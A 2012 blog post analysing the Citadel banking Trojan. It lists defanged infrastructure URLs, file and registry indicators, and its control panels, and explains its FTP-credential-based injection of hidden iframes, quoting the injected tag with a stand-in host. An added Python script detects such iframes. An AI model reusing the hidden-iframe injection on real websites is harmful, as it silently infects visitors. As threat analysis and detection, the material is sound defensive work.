Friday, 31 August 2012

Citadel Banker Malware

The Citadel Trojan is an evolution of the well-known ZeuS banking Trojan. Citadel's developers reused the old ZeuS feature set and added new functionality for their criminal purposes, such as video capture on compromised machines (useful for watching a user's actions on virtual keyboards) and sending stolen login credentials through the Jabber instant-messaging application.


The infrastructure of a Citadel malware instance has been found hosted on the domain helikopterz1922.in, which resolves to the IP 194.1.184.74, belonging to the provider PROVITEX in Russia.

The Trojan's infection vector is located at the URL: hxxp://helikopterz1922.in/xoiajcss/file.php

It downloads the malicious binary:

hxxp://helikopterz1922.in/xoiajcss/files/tomat.exe

and also downloads the Citadel configuration settings from the address:

hxxp://helikopterz1922.in/xoiajcss/files/tomatconfig.bin

After analysing the behaviour of the malicious binary tomat.exe (MD5: 982e1a20030408cad318309a076a6539), the following files were found to be created on the infected computer:

%AppData%\Eqbi\tooz.exe
%AppData%\Naosif\iwox.mik
%AppData%\Naosif\iwox.tmp
%AppData%\Neep\xidi.yvr
%Temp%\tmp20ae17ad.bat

In addition, it modifies the system registry and creates a mutex to mark its presence on the compromised computer: Local\{CA7FD20C-31FB-4F90-B762-F45413F09EC3}

The login control panel of this Citadel Trojan is located at the URL:

hXXp://helikopterz1922.in/xoiajcss/cp.php?m=login

As shown in the following screen capture:



The same control-panel infrastructure also hosts a "VncFox 2012 - Citadel Software" panel, a botnet control panel for the infected computers that uses VNC to take full remote control of the compromised machines by accessing their desktops.

The VNC control panel is accessed via the URL:

hXXp://helikopterz1922.in/xoiajcss/vnc/admin.php


MALICIOUS IFRAME INJECTION

On the same malware server infrastructure there is another Citadel control panel, with the difference that this one is configured to inject malicious iframes into web servers whose access credentials have been captured by the Trojan.

This Citadel control panel is located at:

hXXp://helikopterz1922.in/zaqiryt/cp.php?m=login



Citadel takes advantage of an old, well-known ZeuS functionality that automatically captures the login credentials of any FTP session opened on the compromised machine.

With these stolen FTP credentials, the Citadel control panel connects over FTP to those servers and performs a recursive search of the public web folders ('*www*', 'public*', 'domain*', '*host*', 'ht*docs', '*site*', '*web*'), where websites are usually hosted, looking for files with names or extensions such as 'index.*', '*.js' and '*.htm*', and injects into them the malicious iframe it has been configured with for downloading the malware:

<IFRAME src="hXXp://example.com/" width=1 height=1 style="visibility: hidden">
In this way the websites on those servers are modified, and whenever a client visits them the hidden iframe silently loads the malicious URL in the visitor's browser and the infection of that computer begins.
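For a web administrator checking whether a site has been tampered with in this way, the following Python script is an added example (it is not part of the original post and not a Citadel component): it walks a web root, looks only at the directory and file name patterns the post says the injector targets, and reports iframe tags that are 1x1 pixels or hidden by CSS, the shape of the injected tag shown above. The sample pages built by demo_scan() are constructed for the example; the function and pattern names are this example's own.

```python
import fnmatch
import os
import re
import tempfile

# Directory and file name patterns the post reports the injector searching for
WEB_DIR_PATTERNS = ["*www*", "public*", "domain*", "*host*", "ht*docs", "*site*", "*web*"]
WEB_FILE_PATTERNS = ["index.*", "*.js", "*.htm*"]

# Any <iframe ...> opening tag, case-insensitive, possibly spanning lines
IFRAME_RE = re.compile(r"<\s*iframe\b[^>]*>", re.IGNORECASE | re.DOTALL)
SRC_RE = re.compile(r"""src\s*=\s*["']?([^"'\s>]+)""", re.IGNORECASE)
# width/height of 0 or 1 pixel, quoted or not ("width=1", width="0"); \b keeps 10, 100 ... from matching
TINY_W_RE = re.compile(r"""width\s*=\s*["']?\s*[01]\b""")
TINY_H_RE = re.compile(r"""height\s*=\s*["']?\s*[01]\b""")
HIDDEN_RE = re.compile(r"visibility\s*:\s*hidden|display\s*:\s*none")


def is_suspicious_iframe(tag: str) -> bool:
    """True when an <iframe> tag has the injected tag's shape: 1x1 (or 0x0) pixels, or hidden via CSS."""
    t = tag.lower()
    tiny = TINY_W_RE.search(t) is not None and TINY_H_RE.search(t) is not None
    hidden = HIDDEN_RE.search(t) is not None
    return tiny or hidden


def find_injected_iframes(text: str):
    """Return a list of (offset, src) for every suspicious iframe tag found in the text."""
    hits = []
    for m in IFRAME_RE.finditer(text):
        tag = m.group(0)
        if is_suspicious_iframe(tag):
            src = SRC_RE.search(tag)
            hits.append((m.start(), src.group(1) if src else None))
    return hits


def matches_any(name: str, patterns) -> bool:
    """Case-insensitive shell-style match of a single path component against a pattern list."""
    return any(fnmatch.fnmatch(name.lower(), p) for p in patterns)


def in_web_dir(dirpath: str, root: str) -> bool:
    """True when some component of dirpath below root looks like a public web folder."""
    rel = os.path.relpath(dirpath, root)
    parts = [] if rel == "." else rel.split(os.sep)
    return any(matches_any(p, WEB_DIR_PATTERNS) for p in parts)


def scan_webroot(root: str) -> dict:
    """Walk root, check only the files the injector would touch, and map path -> list of hits."""
    findings = {}
    for dirpath, _dirnames, filenames in os.walk(root):
        if not in_web_dir(dirpath, root):
            continue
        for fn in filenames:
            if not matches_any(fn, WEB_FILE_PATTERNS):
                continue
            path = os.path.join(dirpath, fn)
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = find_injected_iframes(fh.read())
            except OSError:
                continue
            if hits:
                findings[path] = hits
    return findings


def demo_scan() -> dict:
    """Build a constructed web root in a temp dir, scan it, and return {file name: [src, ...]}."""
    with tempfile.TemporaryDirectory() as root:
        site = os.path.join(root, "public_html")  # matches the 'public*' folder pattern
        os.makedirs(site)
        # constructed: a page carrying the injected hidden iframe quoted in the post
        with open(os.path.join(site, "index.html"), "w", encoding="utf-8") as fh:
            fh.write('<html><body><p>Welcome</p>\n'
                     '<IFRAME src="hXXp://example.com/" width=1 height=1 style="visibility: hidden"></IFRAME>\n'
                     '</body></html>')
        # constructed: a clean page with a legitimate, visible embed (must not be flagged)
        with open(os.path.join(site, "about.htm"), "w", encoding="utf-8") as fh:
            fh.write('<html><body><iframe src="https://example.org/embed" width="560" height="315">'
                     '</iframe></body></html>')
        # constructed: a .txt file is outside the targeted name list and is skipped
        with open(os.path.join(site, "notes.txt"), "w", encoding="utf-8") as fh:
            fh.write('<iframe src="hXXp://example.com/" width=1 height=1></iframe>')
        raw = scan_webroot(root)
        return {os.path.basename(p): [src for _off, src in hits] for p, hits in raw.items()}


if __name__ == "__main__":
    print(demo_scan())  # -> {'index.html': ['hXXp://example.com/']}
```

Run it against a real document root with scan_webroot("/path/to/webroot"); a hit is only a lead, so compare the flagged file against a known-good copy or its last legitimate modification time before cleaning it, and rotate the FTP credentials, since the post's scenario starts with those being stolen from an infected workstation.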

Below is shown the Citadel Trojan configuration used to perform the malicious iframe injection:






